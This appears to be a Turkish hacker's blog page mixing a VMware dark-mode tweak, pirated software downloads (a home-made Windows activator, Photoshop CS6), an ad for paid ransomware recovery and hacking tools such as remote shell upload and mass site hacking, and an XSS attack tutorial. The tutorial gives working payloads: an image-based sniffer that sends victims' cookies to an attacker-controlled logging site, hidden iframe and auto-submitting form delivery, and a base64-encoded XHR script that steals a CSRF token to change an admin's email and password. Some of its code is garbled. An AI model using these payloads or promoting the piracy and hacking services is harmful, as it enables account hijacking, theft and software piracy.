VMware Workstation 16.2 dark mode & night mode resolved – VMware Workstation 16.2 karanlık gece modu sorunu çözüldü.

English:

friends With the new security update, the dark-night mode has been removed. wmware has announced that it will release a patch about it in the coming days.
We can fix this issue without waiting for the next patch. dude please follow the below procedure 🙂

C:\Users\yourUsername\AppData\Roaming\VMware\preferences.ini ini file opened to notepad

Add line at end:

wsFeatureDarkModeSupported = “TRUE”

Save file. Restart VMware Workstation app. see u 🙂

Türkçe:

arkadaşlar yeni gelen güvenlik güncellemesi ile karanlık- gece modu kaldırıldı. wmware bununla ilgili önümüzdeki günlerde bir yama yayınlayacağını açıkladı.
gelecek yamayı beklemeden bu sorunu düzeltebiliyoruz. kanka lütfen aşağıdaki işlemi uygula 🙂

C:\Users\kullaniciadi\AppData\Roaming\VMware\preferences.ini dosyasını bul ve not defteri ile aç

wsFeatureDarkModeSupported = “TRUE” buradaki satırı kopyalayıp satırın en sonuna yapıştır ve kaydet.

son olarak ise VMware Workstation uygulamasını yeniden başlat. işlem bu kadardı kanka selametle. 🙂

Kaizer Perpertual. Windows 10/11 Activator Safe and Pure – Kaizer Perpertual. Windows 10/11 Lisanslama Programı

Arkadaşlar bildiğiniz gibi KMSPICO adlı yazılımı virüsler ve trojanlarla dolu. ve kullanılması çok riskli bende bu konu üzerine Windows 10/11 Activator aracını yazmayı düşündüm ve kullanıma sundum. içerisinde kesinlikle virüs yoktur. sorunsuz şekilde kullanabilirsiniz.

Bu araç sayesinde tüm win 10/11 makinelerin sorunsuz şekilde lisanslamasını yapabilirsiniz. x64 ve x86 sürümlerinde sorunsuz çalışmaktadır.

Friends, as you know, the software called KMSPICO is full of viruses and trojans. and it is very risky to use, so I thought of writing the Windows 10/11 Activator tool on this subject and put it into use. There is absolutely no virus in it. you can use it without any problem.

Thanks to this tool, you can license all win 10/11 machines without any problems. It works fine on x64 and x86 versions.

indirme linkleri:

Download links:

https://www.mediafire.com/file/9pfgpmvohwgm698/Kaizer_Perpetual_Activator_%2523fuck_kmspico.rar/file

https://dosya.co/9qh83d9r1cp5/Kaizer_Perpetual_Activator__fuck_kmspico.rar.html

https://rapidshare.io/1MU0/Kaizer_Perpetual_Activator__fuck_kmspico.rar

https://www.dosyaupload.com/2M53u/Kaizer_Perpetual_Activator__fuck_kmspico.rar

https://s7.dosya.tc/server20/w1qefn/Kaizer_Perpetual_Activator__fuck_kmspico.rar.html

https://dosya.org/VPQxU

https://dosyam.org/Z78/Kaizer_Perpetual_Activator__fuck_kmspico.rar

https://dosyayukle.club/Xr5/Kaizer_Perpetual_Activator__fck_kmspico.rar

https://www.dosya.tv/f6d3d3588dadc966/Kaizer_Perpetual_Activator__fck_kmspico.rar

Fidye virüsü temizleme ve geri getirme (kesin çözüm) Türk hacker kaizer Farkıyla! hemen mesaj atın mailden yada whatsapp’tan!! Wannacry .mado ve diğer tüm şifrelenmiş dosyalarınızı Cüzi bir ücret karşılığında kurtarıp size teslim ediyoruz.

mado-infected-filessfre

Arkadaşlar Ransomware Şifrelenmiş tüm dosyalarınızı .xxx şifrelenen yada .mado 2020 son hali’de dahil WannaCry şifrelerini kırarak/deşifre ederek size veriyoruz. evet herşey çok güzel…… okumaya devam edin şimdi diyeceksiniz bu pezevenk neden para istiyor amına koyim 😉 ulan ben bu işi yapıyorum senin o kadar önemli dosyanı getirip sana veriyorum bilmem kaç bin dolar istenen o önemli dosyalarını 50-100 ₺ tl gibi. dosya sayısına göre pazarlık olurda artık neyse yani hiçmi bişey almayayım beleşci 😉 Ayrıca hiç panik yapmayın kesinlikle format atmayın ve pc deki antivirüs programını çalıştırmayın! Neden çalıştırmayalım amk vürüsleri temizlesin dediğini duyar gibiyim. niye biliyon mu? çünkü sen o virüsleri tararken muhtemelen çoğu dosyan silinecek veya bozulacak fidye vürüsü dosyanı bozmaz sadece içeriğini şifreleyip uzantısını .xxx yada .ebeninamı gibi vs bişey yapar onun için tavsiyelere uymanda fayda var benden demesi 😉 şimdi çocuğa anlatır gibi yazacağım amk iyi dinle 😉 Hack Toollslar: Metasploit tedariki,toplu web site hack,server rootlama,uzaktan shell yükleme(WordPress ­,Joomla ­,Drupal ­,OsCommerce,Prestashop ­,Opencart ­için) web site açık tarayıcı,Windows için gerçek ip değiştirme programı,sahte mail,Ayrıca kredi kartı işlerine girmeyin ebenizin amını görürsünüz 😉 bir yudum daha çay alayım ohoho bu nasıl çay amk. ödemeleri sanal kart/payeer/banka kartı üzerinden alıyoruz teşekkür ederim. neyse saadete geleyim arkadaşlar mail veya Whatsapp numaramı buraya bırakıyorum iletişime geçersiniz teşekkür ederim.

Mail:kaizersec@gmail.com
İnstagram:turk.kaizer
Github:kaizerdefacerx
Twitter:kaizerdefacer
Facebook:kaizerTR
Zone-h.org:Kaizer Soze
WhatsApp:

Xss acikları ve kullanımı (yasin tasdemir Turkguvenligi !)

Bu yazıda XSS (Cross Site Scripting – Çapraz Siteden Betik Çalıştırma) saldırılarının kullanımından bahsedeceğim. Bulma yöntemlerini az çok biliyorsunuzdur zaten.

Bu açık türü de nerdeyse tüm web application açık türleri gibi, Input Validationeksikliğinden kaynaklanır.

Yani dışarıdan kullanıcının girebildiği parametrelerin filtrelenmemesinden kaynaklanır. Bildiğiniz gibi sql injection da bu sebeple ortaya çıkmaktadır. Ama bu saldırı türünde sayfada “html” veya “javascript” kodları çalıştırmak mümkündür.

Açığa sebebiyet verecek karakterler webmasterın sayfayı kodlarken ne şekilde kodladığına göre değişir ancak en yaygınları ( “, ‘ ,  ) karakterleridir.

Kaça ayrılır?
Çeşitli sınıflandırmalar piyasada mevcut ama ben kendim sınıflandıracak olursam şu şekilde sınıflandırırım.

Reflected XSS
İngilizce terimlere takılmayın, mantık şudur: dışarıdan alınan parametre, filtrelenmemiş bir vaziyette sayfaya yansır. Doğal olarak dışarıdan “html” kodu alınırsa da sayfada bu kod çalışacaktır. Veya bir html tag’inin bir attribute’ünü kapatarak yeni attribute’ler (örn: onmouseover=”zararlıkod”) eklemek de sayfada javascript kod çalıştırmaya imkan sağlayacaktır.

Bu XSS türü chrome’un xss filtresi tarafından, webmaster bir istisna tanımlamadıysa engellenmektedir.
Chrome XSS filtresi, dışarıdan alınan parametrelerde html kodu varsa ve bu kod sayfaya yansıyorsa bu kodu çalıştırmaz. Bypass yöntemleri vardır, ancak uğraşmadım.

Stored(Persistent , Kalıcı) XSS
Bu xss türünde saldırganın girdiği zararlı kodlar veritabanında veya bir sayfada tutulur. Bu veriler daha sonra açıklı sayfa ziyaret edildiğinde çalıştırılmış olur. Bu XSS türü en tehlikelisidir çünkü buna karşı chrome ve diğer tarayıcılar default ayarlarla bir önlem alamaz. Çünkü saldırı kodu dışarıdan yalnızca bir kez parametre olarak alınmıştır veveritabanına işlenmiştir. Açıklı sayfalar bu kodu veritabanından çağıracağı için dışarıdan herhangi bir parametre alındığı düşünülemez. Bu xss türünün sıkça rastlandığı sayfalar şunlardır; kayıt formları, iletişim formları..

DOM XSS (document object model)
Bu xss açık türü, kullanıcıdan alınan, doğrudan servera gönderilen veya tarayıcı tarafından client side olarak alınan ancak düzgün filtrelenmemiş parametrelerin javascript kodlarında yorumlanarak çalıştırması sonucu ortaya çıkar.
Yani bu xss açık türü client side‘da da(Örn; # hashtag kullanılarak url üzerinden gönderilen, daha doğrusu javascriptte hashtagden alınarak kullanılan parametreler) server tarafında da efektif olabilir. Eğer açık client side olarak kullanılabiliyorsa server loglarına düşmeyecektir ve tespit edilmeyecektir.
Her neyse bu xss türünde mantık, açığın javascript kodlarından kaynaklanmasıdır. Kullanım açısından normal xss den pek bi farkı yoktur. Onda yapılabilen hemen her şey bunda da yapılabilir.

XSS İLE NELER YAPILABİLİR?
En tehlikeliden başlayalım;

1) SSI Injection
SSI (server side include) shtml sayfaların çalışma mantığıdır. Sayfa html olsa bile yorum satırı arasına yazılan komutlar client side değil, server side olarak çalıştırılır.
Örnek kullanım şekli şudur;

örneğin yukarıdaki satır bir .shtml sayfada bulunursa; veya sayfa shtml olmasa, php,asp,aspx ve hatta html olsa bile web application serverda SSI ayarları açıksa, ekrana sistem tarih saatini basacaktır.

Bu özelliği xss ile kombo çekersek sistemde komut çalıştırmamız mümkün olur.
örneğin;
http://site.com/index.php?ara=xss
açığımız olsun
http://site.com/index.php?ara=

gönderdiğimizde sayfada tarihi görüyorsak SSI komutları çalıştırabiliriz demektir.
SSI komutlarına aşağıda detaylı bi şekilde erişebilirsiniz;
SSI komutlarına aşağıda detaylı bi şekilde erişebilirsiniz;
http://www.w3.org/Jigsaw/Doc/User/SSI.html
ama benim favorim;

Not: Dom xss te çıktılar javascript üzerinden alınıp tarayıcı tarafından üretildiği için, doğrudan response a yansımadığı için SSI injection’a çevirme lüksüne sahip değiliz.

2) COOKIE Çalma;
Bildiğiniz üzere XSS ile javascript çalıştırabiliriz, bu da demektir ki javascript üzerinden erişilebilen her şeye erişebiliriz.
Buna document.cookie nesnesi de dahil.
Peki cookie yi nasıl çalarız?

Açıklı parametre GET metodu ile alınıyorsa;
http://site.com/index.php?ara= Burada “a” sayfası kendi hazırladığımız javascripttir. Kullandığım snifferdan örnek verecek olursam şuna benzer bi kod barındırır; i=new/**/Image();i.src=http://sniffersitemiz.com/log.php?’+document.cookie+’  ‘+document.location Burada javascript kodu üzerinden bir image nesnesi oluşturulur ve http://sniffersitemiz.com/log.php?’+document.cookie+’  ‘+document.location verileri img src edilir. log.php sayfamızda ise dışarıdan gelen değerleri loglarız. Bu sayede document.cookie ve document.location değerlerini loglamış oluruz.  yerine

kodunu da kullanabilirdik, burada amaç karmaşıklığı azaltmak ve mümkün olduğunca özel karakter kullanmamak.

Peki bunu admine nasıl tıklatırız?
Adama doğrudan
http://site.com/index.php?ara= şeklinde link atarsanız muhtemelen tıklamayacaktır. Onun yerine 2 farklı yöntem kullanabilirsiniz 1. yöntem “ara=” dan sonraki tüm karakterleri hex formatında yazmaktır. Ancak çoğu tarayıcı artık özel karakterler dışındakileri hex formatında yazsanız da karakter olarak gösterdiğinden eskisi gibi iş görmüyor. Onun yerine en mantıklısı size ait bir sitede sayfaya şuna benzer bir kod eklemenizdir; <iframe src="http://site.com/index.php?ara=http://sniffersitemiz.com/a” width=”0″ height=”0″>Daha sonra adama http://benimsitem.com/sayfa.html şeklinde iframe kodlu sayfanın linkini atmaktır.

POST metoduyla alınan parametre üzerinde var olan XSS açığının kullanımı;
Örneğin xss imiz “ara” parametresini get değil de post metodu ile alıyor olsun;
POST dedimmi akla “form” gelir.
Önce şu şekilde bir form hazırlarız;


<input name="ara" value="http://sniffersitemiz.com/a” />
 

Bu formu hazırlasak bile açıldığında kendi kendine post yaptırmamız lazım. O yüzden şu javascript kodunu da sayfanın sonuna ekliyoruz.

document.forms[0].submit();

Bu kod sayfa ziyaret edildiği anda formu otomatik post yapacaktır.

<input name="ara" value="http://sniffersitemiz.com/a” />
 

document.forms[0].submit();
Sayfamızı “xss.htm” olarak kaydettik ve sayfayı admine direk atmayacağımıza göre kendi sitemize yükledik.
http://benimsitem.com/xss.htm” şeklinde linkimiz oldu.
Ancak bunu da admine direk attığımızda açar açmaz form yönleneceği için kıllanma ihtimali yüksek. Tekrar iframe li sayfa hazırlıyoruz.

http://benimsitem.com/xss.htm

 

ve bu kodu örneğin index.html sonuna ekliyoruz.
Admine http://benimsitem.com linkini atıyoruz ve admin tıkladığında arka planda cookie’ler bize geliyor.

NOT:
HttpOnly cookieler;
Server cookie üretirken sonuna  “; HttpOnly eklediyse, tarayıcı bu cookielere erişimi javascripte kısıtlar. Yani javascriptin document.cookie nesnesinde bu cookieleri göremezsiniz. Eskiden bu kısıtlama Trace metodu ile Set-Cookie response headerı okunarak aşılabiliyordu. Normalde bu header’a javascript istekleriyle erişemezsiniz. Ancak akıllandılar ve bu yöntem de yalan oldu.

Örneğin resimde http başlığı işaretli olanlar bu sınıfa girmektedir. Bu cookielere javascript üzerinden erişemezsiniz.

Geriye tek bir yöntem kalır.

CSRF
Bildiğiniz gibi csrf, “csrf token” parametresi veya HTTP header‘lar üzerinden kod doğrulaması yapmayan sayfalarda kullanıcıya otomatik istek göndertme saldırılarıdır. Misal bu tip bir saldırı ile kullanıcıya bir sayfa ziyaret ettirilir. Bu sayfaya kendi profili veya ayarları üzerinde değişiklik yaptırtacak forma veya url ye aynı xss te hazırladığımız gibi otomatik gönderecek bir sayfa iframe ettirilir. Kişi sayfayı ziyaret ettiğinde otomatik olarak örneğin email bilgisi güncellenmiş olur.

Ancak dediğimiz gibi artık hemen hemen her script csrf-token kullanmaktadır. Burada XSS ten faydalanırsak, form ziyaret edildiğinde üretilen csrf-token bilgisini çekebiliriz.

Bu iş için XmlHttpRequest ten faydalanacağız. Normalde XHR isteği tarayıcıların güvenlik poliçesi gereği sadece aynı domaine gönderilebilir(same-origin policy). Bu da demektir ki
http://site.com/profil.php” ye “http://site.com” altında bir sayfadan istek gönderebiliriz.
Zaten XSS açığımız da bu işe yarayacak 😉

Saldırı yapılacak sitedeki bilgi güncelleme formu şu şekilde olsun;






 

Bu form dikkat ettiyseniz site tarafından üretilmiş bir csrf-token parametresi barındırmaktadır ve kullanıcıdan aldığı tokenle sitedekini karşılaştırıp eşleştirme sağlarsa güncelleme işlemi gerçekleştirmektedir.

Örnek bir XmlHttpRequest kodu aşağıda verilmiştir;






 


var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
a=ayikla(xhr.responseText);
document.getElementById(‘csrf-token’).value=a;
document.forms[0].submit();
}
}
xhr.open(‘GET’, “http://site.com/profil.php&#8221;, true);
xhr.send(null);
Bu kodda en üstte formumuz mevcuttur. Bu form postlandığında girdiğimiz değerler güncellenecektir ancak csrf-tokeni bilmemekteyiz.
Yukarıdaki javascript kodları çalıştığında şu adımlar gerçekleşir;
1. http://site.com/profil.php sayfasına istek gönderilir.
2. Geri dönen yanıt sayfası alınır ve ayıkla fonksiyonuna gönderilir. Burada ayıkla fonksiyonunu yazmadım. Bu fonksiyon profil.php nin ürettiği yanıt sayfasından csrf-token değerini ayıklar.
3. Alınan değer formumuzdaki csrf-token parametresine verilir.
4. Form postlanır.
5. Heklediniz.

Bu kodları xss kodu olarak yazmak zor bir iştir. Neticede uzun ve karmaşık, artı özel karakterlerden oluşan kodlardır.
Önce kodları base64 e çeviririz.

PGZvcm0gYWN0aW9uPWh0dHA6Ly9zaXRlLmNvbS9wcm9maWwucGhwIG1ldGhvZD1wb3N0PiA8aW5wdXQgbmFtZT1lbWFpbCB2YWx1ZT0iaGFja2VyQGFzZHF3ZS5jb20iPiA8aW5wdXQgbmFtZT1wYXNzd29yZCB2YWx1ZT0iMTIzNDUiPiA8aW5wdXQgbmFtZT1hZCB2YWx1ZT0ibWFsIj4gPGlucHV0IG5hbWU9c295YWQgdmFsdWU9Im1hbCI+IDxpbnB1dCBuYW1lPWNzcmYtdG9rZW4gaWQ9Y3NyZi10b2tlbiB0eXBlPWhpZGRlbiB2YWx1ZT0iIj4gPC9mb3JtPiAgPHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub25yZWFkeXN0YXRlY2hhbmdlID0gZnVuY3Rpb24oKSB7ICBpZiAoeGhyLnJlYWR5U3RhdGUgPT0gNCkgeyAgIGE9YXlpa2xhKHhoci5yZXNwb25zZVRleHQpOyAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjc3JmLXRva2VuJykudmFsdWU9YTsgICBkb2N1bWVudC5mb3Jtc1swXS5zdWJtaXQoKTsgIH0gfSB4aHIub3BlbignR0VUJywgImh0dHA6Ly9zaXRlLmNvbS9wcm9maWwucGhwIiwgdHJ1ZSk7IHhoci5zZW5kKG51bGwpOyA8L3NjcmlwdD4=

Elde etmiş oluruz. Artık XSS li sayfadan saldırı kodunu şu şekilde çağırabiliriz.

<script>document.write(atob(“PGZvcm0gYWN0aW9uPWh0dHA6Ly9zaXRlLmNvbS9wcm9maWwucGhwIG1ldGhvZD1wb3N0PiA8aW5wdXQgbmFtZT1lbWFpbCB2YWx1ZT0iaGFja2VyQGFzZHF3ZS5jb20iPiA8aW5wdXQgbmFtZT1wYXNzd29yZCB2YWx1ZT0iMTIzNDUiPiA8aW5wdXQgbmFtZT1hZCB2YWx1ZT0ibWFsIj4gPGlucHV0IG5hbWU9c295YWQgdmFsdWU9Im1hbCI+IDxpbnB1dCBuYW1lPWNzcmYtdG9rZW4gaWQ9Y3NyZi10b2tlbiB0eXBlPWhpZGRlbiB2YWx1ZT0iIj4gPC9mb3JtPiAgPHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub25yZWFkeXN0YXRlY2hhbmdlID0gZnVuY3Rpb24oKSB7ICBpZiAoeGhyLnJlYWR5U3RhdGUgPT0gNCkgeyAgIGE9YXlpa2xhKHhoci5yZXNwb25zZVRleHQpOyAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjc3JmLXRva2VuJykudmFsdWU9YTsgICBkb2N1bWVudC5mb3Jtc1swXS5zdWJtaXQoKTsgIH0gfSB4aHIub3BlbignR0VUJywgImh0dHA6Ly9zaXRlLmNvbS9wcm9maWwucGhwIiwgdHJ1ZSk7IHhoci5zZW5kKG51bGwpOyA8L3NjcmlwdD4=“));</script>

Veya script tag’leri arasındaki kodu kendi sitenize yükleyip, 
ile de çağırabilirsiniz.

Konu çok uzun olduğundan kısa kısa yazdım. Umarım anlaşılır olmuştur.

Kaynak göstermeden alıntı yapmak yasaktır.

 

Beklenen Son Sürüm adobe Photoshop cs6 :)

photoshop-free-download-so

Adobe Photoshop CS6 Full Türkçe Son Sürüm

Adobe Photoshop CS6 Grafik tasarım programıdır 3D olarak çalışmalar yapmanızı sağlar,
Bilen bilmeyen bir çok kişi logo yapımında sunum proje vb bir çok anlanda kullanılmakta,
Tabi kendinizi geliştirmek isterseniz son sürümdür işinizi görebilmesi için.
istek üzerine ekliyorum 🙂 güle güle Kullanın

Boyut: 2 gb
Sıkıştırma: Rar / Şifresiz
Tarama: Webroot. / Durum Temiz

1: http://turbobit.net/6x0h76ag76pz.html

2: https://cloud.mail.ru/public/e54a2ccae9fd/Shp6Tr.T.rar

Mobil cihazlardan silinen verileri Dr Fone ile Kurtarın

2

Her geçen gün biraz daha gelişen mobil teknoloji, kullanıcıların akıllı cihazları üzerinde giderek daha fazla bilgi depolamasına olanak veriyor. Fakat ne yazık ki cihazlarımızda depoladığımız veriler gerek teknik gerekse kişisel hatalar sebebiyle her zaman kaybolma tehlikesiyle karşı karşıya.
Windows PhoneAndroid veya iOS fark etmeksizin tüm kullanıcılar günlük hayatlarında veri kaybıtehlikesiyle karşı karşıya kalabilir. Bu tehlikenin kaynağı teknik veya kişisel hatalardan doğabilir. Örneğin masada duran telefonunuzun yanlışlıkla yere düşmesi veya acele bir iş üzerindeyken yapacağınız hatalı bir parmak hareketi, cihazınızda depolamış olduğunuz verilerin silinmesine sebep olabilir.
Bunlar her kullanıcının başına gelebilecek tehlikeler arasında. Fakat asıl önemli olan bu gibi durumlarda uygulayabileceğimiz adımlar ve söz konusu verilerin mümkün olan en az zararla nasıl kurtarılabileceği. Mobil cihazlardan veri kurtarmak amacıyla kullanabileceğimiz pek çok araç mevcut. Bunlardan bir tanesi de Dr. Fone for iOS ve Dr. Fone for Android.
Bu programların her ikisi de akıllı telefonlardan ve tabletlerden veri kurtarmak amacıyla kullanılmak üzere tasarlanmış. İsimlerinden de anlaşılabileceği gibi birisi iOS birisi de Android cihazlardan veri kurtarmak için gereken araçları barındırıyor. İşin güzel yanı da her iki sürümün de hem Windowshem de Mac sürümlerinin olması. Mobil cihazınıza ve bilgisayarınızın işletim sistemine uygun olanı, aşağıdaki bağlantılar üzerinden indirebilirsiniz. Unutmayınız ki sunduğumuz versiyonlar ücretsiz deneme sürümleridir. Verilerin geri dönüştürülebilmesi için tam sürümün satın alınması gerekiyor.